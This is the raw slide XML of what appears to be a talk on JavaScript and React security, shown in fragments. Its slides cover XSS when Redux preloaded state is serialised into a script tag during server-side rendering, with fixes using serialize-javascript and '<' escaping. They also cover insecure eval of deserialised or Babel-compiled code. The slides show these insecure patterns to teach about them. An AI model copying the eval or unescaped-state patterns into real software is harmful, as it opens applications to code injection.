            <a:ext cx="10972800" cy="1109573"/>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Vulnerable code in tutorials:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://medium.com/front-end-hacking/server-side-rendering-with-react-and-express-382591bfc77c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7391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XSS with Server Side Rendering Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passing state from the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213972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XSS in Redux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1414464"/>
            <a:ext cx="10972800" cy="1262542"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Task</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Initiate the state of the store</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Documentation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://redux.js.org/docs/recipes/ServerRendering.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4397829" y="60719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58515301"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="2198034"/>
          <a:ext cx="10972800" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10972800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="416882232"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">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window.__PRELOADED_STATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>__ = ${</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>JSON.stringify</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>preloadedState</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">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08393521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28903375"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1219200" y="5456794"/>
          <a:ext cx="10363200" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10363200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1182511606"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>window.__PRELOADED_STATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>__ = ${</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>JSON.stringify</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>preloadedState</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>).replace(/</a:t>
                      </a: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0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>g, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'\\u003c'</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009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>script</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="009900"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>&gt;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110629596"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3335153"/>
            <a:ext cx="10972800" cy="890609"/>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t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="635508" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform JavaScript encoding with serialize-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> module</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5130409"/>
            <a:ext cx="10972800" cy="371171"/>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635508" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Escape '&lt;' character (Redux documentation fix)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2124084918"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1218696" y="4145697"/>
          <a:ext cx="10363704" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10363704">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="459592956"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>import</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> serialize from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'serialize-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>javascript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a: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br>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>initialState</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serialize</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JSON</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stringify</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initialState</a:t>
                      </a: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652689614"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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5312" y="156603"/>
            <a:ext cx="1791203" cy="1400812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9448297" y="432468"/>
            <a:ext cx="2438903" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>“a predictable state container for JavaScript apps”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="55801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447798" y="2633664"/>
            <a:ext cx="8551333" cy="2124604"/>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State of JavaScript today</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common JavaScript vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Frameworks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>React vulnerabilities and security-related quirks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>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412998" y="2818671"/>
            <a:ext cx="7586133" cy="1419887"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript makes me want to flip the table and say “screw all this”, but I can never be sure what “this” refers to.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15221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Eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… Again?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1302170"/>
            <a:ext cx="10972800" cy="909890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>New scenarios for insecure evaluation of untrusted code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JavaScript deserialization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3403897491"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1171070" y="3789381"/>
          <a:ext cx="7936019" cy="1054384"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7936019">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4070719037"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="526826">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>import</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> babel from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" i="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8B0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>'babel-core'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>...</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>jsCode</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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>babel</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transform</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jsxCode</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="1500C8"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>eval</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jsCode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>code</a:t>
                      </a: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404229304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30679037"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1171070" y="2226320"/>
          <a:ext cx="7936019" cy="810544"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="7936019">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2155913637"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="414876">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>deserialize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>serializedJavascript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0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>return</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="1500C8"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>eval</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err="1">
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>serializedJavascript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solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                      </a:endParaRP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1976873624"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3286614"/>
            <a:ext cx="10972800" cy="331847"/>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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Using Babel in the code to compile JSX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5450319" y="2968435"/>
            <a:ext cx="3656770" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>https://github.com/yahoo/serialize-javascript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5175105"/>
            <a:ext cx="10972800" cy="872769"/>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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>JSON parsing with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
